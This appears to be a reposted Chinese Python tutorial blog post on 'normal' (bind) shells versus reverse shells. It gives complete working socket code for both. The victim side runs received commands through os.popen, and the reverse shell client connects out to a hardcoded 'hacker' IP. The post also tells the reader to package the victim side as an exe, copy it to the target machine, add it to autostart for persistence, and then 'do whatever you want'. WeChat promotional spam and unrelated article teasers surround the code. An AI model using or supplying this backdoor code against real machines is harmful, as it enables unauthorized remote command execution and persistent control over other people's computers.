python教程:正常shell与反弹shell

嗨喽,大家好呀~这里是爱看美女的茜茜呐

正常shell需要先在攻击端开机情况下开启程序,然后攻击端运行程序,才能连接

  • 反弹shell,攻击端是服务端,被攻击端是客户端

  • 正常shell,攻击端是客户端,被攻击端是服务端

  • 反弹shell,先启用服务端,再启用客户端

反弹shell的好处就是:一旦被攻击端开机,立即连接上攻击端(需要攻击端一直运行)


👇 👇 👇 更多精彩机密、教程,尽在下方,赶紧点击了解吧~

python源码、视频教程、插件安装教程、资料我都准备好了,直接在文末名片自取就可


shell:

客户端:

import socket
s=socket.socket()
s.connect(("192.168.0.114",1234))   #连接的服务器的ip地址,端口
for i in range(10):com=input("command:")s.send(com.encode())     #发送信息d=s.recv(1024)           #接受数据的大小print(d.decode(),len(d))

服务端:

'''
python资料获取看这里噢!! 小编 V:Pytho8987(记得好友验证备注:6 否则可能不通过)
即可获取:文章源码/教程/资料/解答等福利,还有不错的视频学习教程和PDF电子书!
'''
#服务器端
import socket
import os
s=socket.socket()   #创建套接字 #s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.bind(('0.0.0.0',1234))    #绑定地址和端口#0.0.0.0接收任意客户端ip连接
s.listen(5)                 #调用listen方法开始监听端口,传入的参数为等待连接的最大数量
con,addr=s.accept()     #接受一个客户端的连接
#print(con,addr)for i in range(10):cmd=con.recv(1024)print(cmd)command=cmd.decode()if command.startswith("cd"):os.chdir(command[2:].strip())   #切换路径result=os.getcwd()      #显示路径else:result=os.popen(command).read()if result:con.send(result.encode())else:con.send(b"OK!")
测试:(客户端(win10)、服务端(win7))

1.把服务端打包成exe文件,然后在win7运行打包好的exe文件,python打包成exe文件这里推荐pyinstaller模块(需要安装,安装方法不会的百度)

打包成exe文件时最好打包成文件夹,如何打包成单个exe文件,在win7中运行可能会出题。

下图就是打包的文件夹,双击运行图中exe文件

2.在win10运行客户端

反弹shell:

客户端:

'''
python资料获取看这里噢!! 小编 V:Pytho8987(记得好友验证备注:6 否则可能不通过)
即可获取:文章源码/教程/资料/解答等福利,还有不错的视频学习教程和PDF电子书!
'''
#反弹shell,攻击端是服务端,被攻击端是客户端
#正常shell,攻击端是客户端,被攻击端是服务端
#例:攻击端(win10),被攻击端(win7),正常shell,先在win7启动服务端,再在win10启用客户端
#   反弹shell,先在win10启用服务端,再在win7启用客户端
#   反弹shell的好处就是:一旦被攻击端开机,立即连接上攻击端(需要攻击端一直运行)
#   正常shell需要先在攻击端开机情况下开启程序,然后攻击端运行程序,才能连接    
import socket
import os
import sys
import time
#print(sys.argv)
#hacker=sys.argv[1]
hacker="192.168.0.144"
port=1234
server=(hacker,port)
s=socket.socket()
s.connect(server)while 1:# 得到被攻击端的所在目录,并发送dir=os.getcwd()#print(dir)s.send(dir.encode())# 接收来自攻击端(服务器端)的命令,并进行处理cmd=s.recv(1024).decode()# 对接收的命令做出判断# 退出if cmd=="exit":breakelif cmd.startswith("cd"):os.chdir(cmd[2:].strip())result="切换目录成功!"else:result=os.popen(cmd).read()if not result:result="命令执行完毕!"s.send(result.encode())time.sleep(1)s.close()
print("退出!")

服务端:

'''
python资料获取看这里噢!! 小编 V:Pytho8987(记得好友验证备注:6 否则可能不通过)
即可获取:文章源码/教程/资料/解答等福利,还有不错的视频学习教程和PDF电子书!
'''
import socket
import time
server=("0.0.0.0",1234)
s=socket.socket()
s.bind(server)
s.listen(5)
con,addr=s.accept()
print(addr,"已经接入!")
while 1:#接收来自被攻击端的所在目录dir=con.recv(1024).decode()cmd=input(dir+":").strip()con.send(cmd.encode())if cmd=="exit":breakresult=con.recv(65365)print(result.decode())time.sleep(1)
s.close()
print("退出!")
测试:
  1. 先在win10运行反弹shell服务端

  2. 再把反弹shell客户端打包成exe文件夹,复制到win7中,然后双击运行

  3. 这时可以看到服务端(win10)已经和客户端(win7)连接上了。

    #只要服务端一直运行,如果把客户端的程序加入到开机自启,这样客户端已开启就被连接到服务端

4.接下就可以为所欲为了

尾语

感谢你观看我的文章呐~本次航班到这里就结束啦 🛬

希望本篇文章有对你带来帮助 🎉,有学习到一点知识~

躲起来的星星🍥也在努力发光,你也要努力加油(让我们一起努力叭)。

最后,宣传一下呀~👇👇👇更多源码、资料、素材、解答、交流皆点击下方名片获取呀👇👇

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/217243.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

TDA笔记:夏克林老师,南洋理工大学

TDA比传统的统计方法有优势:benchmark中展现了这种优势 laplacian矩阵 多种单纯复形构造方式,可以构造出不同表征 二部图:Dowker complex Tor algebra可以用到多大数据 目前较新

在CentOS 7.9上搭建高性能的FastDFS+Nginx文件服务器集群并实现外部远程访问

文章目录 引言第一部分:FastDFS介绍与安装1.1 FastDFS简介1.2 FastDFS安装1.2.1 安装Tracker Server1.2.2 安装Storage Server 1.3 FastDFS配置1.3.1 配置Tracker Server1.3.2 配置Storage Server1.3.3 启动FastDFS服务 第二部分:Nginx配置2.1 Nginx安装…

【外贸干货】领英客户开发与营销的六个策略方向

领英(LinkedIn)已经成为外贸营销人员,尤其是B2B外贸营销人员,一个重要且有效的社交媒体平台。 相比于其他社交媒体平台,领英(LinkedIn)在增加流量、产生高质量的潜在客户和建立思想领导力方面有着独有的优势。 因为领英(LinkedIn)不仅仅是获…

使用VUE3实现简单颜色盘,吸管组件,useEyeDropper和<input type=“color“ />的使用

1.使用vueuse中的useEyeDropper来实现滴管的功能和使用input中的type"color"属性来实现颜色盘 效果&#xff1a; 图标触发吸管 input触发颜色盘 组件代码部分 &#xff1a;<dropper> ---- vueuse使用 <template><div class"sRGBHexWrap fbc…

【vue_2】创建一个弹出权限不足的提示框

定义了一个名为 getUserRole 的 JavaScript 函数&#xff0c;该函数接受一个参数 authorityId&#xff0c;根据这个参数的不同值返回相应的用户角色字符串。这段代码的目的是根据传入的 authorityId 值判断用户的角色&#xff0c;然后返回相应的角色名称。 如果 authorityId 的…

盘点24本Python书籍Python爱好者不容错过

盘点24本Python书籍Python爱好者不容错过 学习知识费力气&#xff0c;收集整理更不易。 知识付费甚欢喜&#xff0c;为咱码农谋福利。 下载链接&#xff1a;https://pan.baidu.com/s/1CsXJjHeuxPiQ7-f5t2mM8g?pwd8888 提取码&#xff1a;8888 书籍名称&#xff1a; 《Py…

ADRC自抗扰控制原理

这里写目录标题 TD跟踪微分器ESONLSEF后续把公式的核心原理分析一下 参考链接&#xff1a;ADRC自抗扰控制&#xff0c;有手就行 ADRC是升级版的PID&#xff0c;由TD&#xff08;跟踪微分器&#xff09;&#xff0c;ESO&#xff08;扩张状态观测器&#xff09;&#xff0c;NLSEF…

CMD - ping

文章目录 前言参数 前言 ping 命令主要测试到达指定 IP 或主机的连通性. 参数 -t: ping 指定的计算机直到中断 -a: 将地址解析为主机名 -n count: 要发送的回显请求数

3-全功能pytest测试框架-allure2

3-全功能pytest测试框架-allure2 一:Allure介绍1> Allure 优势2> Allure 安装二:allure demo1> 脚本demo2> 查看result三:allure装饰器1> 装饰器一览表2> 装饰器概述1. epic、feature、story3> @allure.title()4> @allure.testcase()5> @allure.…

想当老师应该去学什么专业

专业选择是决定未来职业发展的重要步骤&#xff0c;如果你也想成为一名老师&#xff0c;那么这五个专业可能会适合你&#xff01; 教育学专业 教育学专业是培养教育理论和方法的学科&#xff0c;这些理论知识将帮助你理解教学过程、学生发展、课程设计和评估。该专业将让你全面…

记一次简单的PHP反序列化字符串溢出

今天朋友给的一道题&#xff0c;让我看看&#xff0c;来源不知&#xff0c;随手记一下 <?php // where is flag error_reporting(0); class NFCTF{ public $ming,$id,$payload,$nothing;function __construct($iii){$this->ming$ii…

基于袋獾算法优化概率神经网络PNN的分类预测 - 附代码

基于袋獾算法优化概率神经网络PNN的分类预测 - 附代码 文章目录 基于袋獾算法优化概率神经网络PNN的分类预测 - 附代码1.PNN网络概述2.变压器故障诊街系统相关背景2.1 模型建立 3.基于袋獾优化的PNN网络5.测试结果6.参考文献7.Matlab代码 摘要&#xff1a;针对PNN神经网络的光滑…